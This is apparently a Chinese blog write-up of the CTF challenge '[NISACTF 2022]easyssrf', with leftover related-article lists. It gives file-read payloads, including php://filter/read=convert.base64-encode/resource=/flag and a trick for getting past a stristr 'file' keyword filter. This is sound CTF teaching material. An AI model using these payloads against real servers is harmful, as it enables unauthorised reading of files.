[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统
它提醒我们输file:///fl4g
它提醒我们输ha1x1ux1u.php
看到代码stristr($file, “file”)当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过
file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码
file=php://filter/resource=/flag
file=/flag
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-02-08 06:16:04       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-08 06:16:04       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-02-08 06:16:04       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-02-08 06:16:04       18 阅读

热门阅读

  1. 宽字节注入漏洞原理以及修复方法

    2024-02-08 06:16:04       31 阅读
  2. 编辑器Zed

    2024-02-08 06:16:04       32 阅读
  3. 蓝桥杯基础知识8 list

    2024-02-08 06:16:04       33 阅读
  4. unity editor 编辑器 GUID localID LocalFileId 查找问题

    2024-02-08 06:16:04       31 阅读
  5. python将word文件转换成pdf文件

    2024-02-08 06:16:04       35 阅读
  6. 为自己的项目媒体资源添加固定高度

    2024-02-08 06:16:04       32 阅读